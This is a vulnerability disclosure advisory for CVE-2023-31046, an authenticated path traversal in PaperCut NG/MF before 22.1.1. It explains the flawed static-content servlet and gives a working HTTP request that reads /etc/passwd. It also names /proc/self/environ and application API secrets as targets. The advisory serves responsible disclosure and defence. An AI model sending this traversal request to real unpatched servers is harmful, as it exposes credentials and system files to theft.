Authenticated Arbitrary File Download (Path Traversal)
- CVE(s): CVE-2023–31046
- Vendor: PaperCut
- Product: PaperCut MF/NG
- Version(s) affected: < 22.1.1
- Fixed version: 22.1.1
Background#
An Authenticated Arbitrary File Download vulnerability was found in PaperCut NG/MF. PaperCut is a popular Print Management product that’s used globally by over 80,000 organisations. Its application server component is written in Java. The majority of customers run their servers behind firewalls, however a number of larger customers like universities may have it hosted on more open servers. As part of my research I found this vulnerability and I worked with PaperCut Software to report, advise and validate a fix. The latest release of PaperCut NG/MF which can be found at http://www.papercut.com/
has the vulnerability addressed and upgrading is the recommended mitigation.
Arbitrary File Download/Read vulnerabilities can occur when an application allows files to be included in an unsafe way on a local machine, often through Directory Traversal techniques (being the root cause) whereby the application directory structure can be traversed to reach areas not originally intended by the developer.
In the case of PaperCut, the application server defines a servlet that can be accessed, with authentication (testing determined this could be the lowest level of authentication available), allowing for a crafted HTTP request to be sent that retrieves files from the underlying filesystem.
Within the web.xml
configuration file for the PaperCut application software, the static-content-files
servlet exists to allow for static content to be retrieved / displayed to the user.
<servlet-mapping>
<servlet-name>static-content-files</servlet-name>
<url-pattern>/content/*</url-pattern>
</servlet-mapping>
The affected Java code is available within the getStaticContent()
function inside the UIContentResource.class
:
@GET
@Path("static/{asset:.*}")
@CacheControlHeader("max-age=600,public")
public Response getStaticContent(@PathParam("asset") String asset) {
try {
File page = getResourceAsFile("/ui/static/" + asset);
String contentType = MimeTypeUtils.getMimeTypeStringFromFileName(page.getName());
return Response.ok(page, contentType).build();
} catch (Exception e) {
return Response.status(Response.Status.NOT_FOUND).build();
}
}
private File getResourceAsFile(String resourcePath) {
String docroot = this._servletContext.getRealPath("/");
return new File(docroot, resourcePath);
}
As shown above within the code-block above, the @PathParam("asset")
excerpt refers to the portion of the URL that is controllable by an authenticated user, which can be manipulated without further sanitisation being performed on the input. Once the crafted parameter has been passed into the getResourceAsFile()
function, a new file object is created containing the contents of the requested file.
In this case, anything related to the application such as API keys (within /papercut/server/data/
), as well as anything accessible on the filesystem such as
/etc/passwd
, /proc/self/environ
can be downloaded by an attacker.
GET /ui/static/..//..//..//..//..//..//..//etc//passwd HTTP/1.1
Host: papercut:9192
Cookie: <..omitted..>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://papercut:9192/ui/static
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
The HTTP response of the above request will contain the requested /etc/passwd
file contents.
Depending on the user that the papercut application server is running as, the available files will vary - however at the very minimum files that lie within the papercut application server directories will be disclosed including API secrets (allowing for authenticated API calls to be made).
Recommendations#
Mitigations were discussed with the PaperCut Software security team and they’ve provided me with following guidance for inclusion within this public disclosure.
“We feel the best course of action for customers is for them to upgrade to the latest release of PaperCut NG/MF which contains fixes for this issue. We will make this clear through our release notes and our check-for-updates feature. We feel the mitigation put into the code is very effective and a good outcome. It has both a mix of your suggestions and the ideas that our security team came up with. Good security comes through a diversity of thought, and we really wanted to call out this as a great example. It’s been amazing working with you, sharing ideas, on how to address this both efficiently and quickly. Often security CVE reports are very one-way. Your collaboration on both mitigation and validation has been a standout. It really demonstrates the importance of ISVs and Infosec providers working together. This aspect is often understated in security research and uplift.”
Timeline#
Here’s a disclosure timeline:
Initial Attempt to Contact Vendor
Contacted the PaperCut Support Team.
Initial Contact with Security Team
Received response from PaperCut Support within 20 minutes.
Vulnerability Disclosure Response
PaperCut Support advised that several fixes had been proposed and a hotfix was available to test.
Vendor Update
Test build of the fix was provided by PaperCut for us to validate proposed fixes.
Vendor Update
PaperCut requested 120 day disclosure timeline as well as discussed other security bulletin related information.
Aura Update
Confirmed that a delayed disclosure was not a problem at all. Vendor's active responses and development updates were showing considerable thought was being put in place around resolving the issue.
Proposed fixes
Further vendor communications around improving the overall effectiveness of proposed fixes.
CVE Assignment: CVE-2023-31046
The vendor had requested a CVE on our behalf: CVE-2023-31046.
Patches!
Vendor released patches, along with public security bulletin: https://www.papercut.com/kb/Main/SecurityBulletinJune2023.
Public Disclosure
CVE disclosure via MITRE and blog posted.
Disclaimer#
The information in this article is provided for research and educational purposes only. Aura Information Security does not accept any liability in any form for any direct or indirect damages resulting from the use of or reliance on the information contained in this article.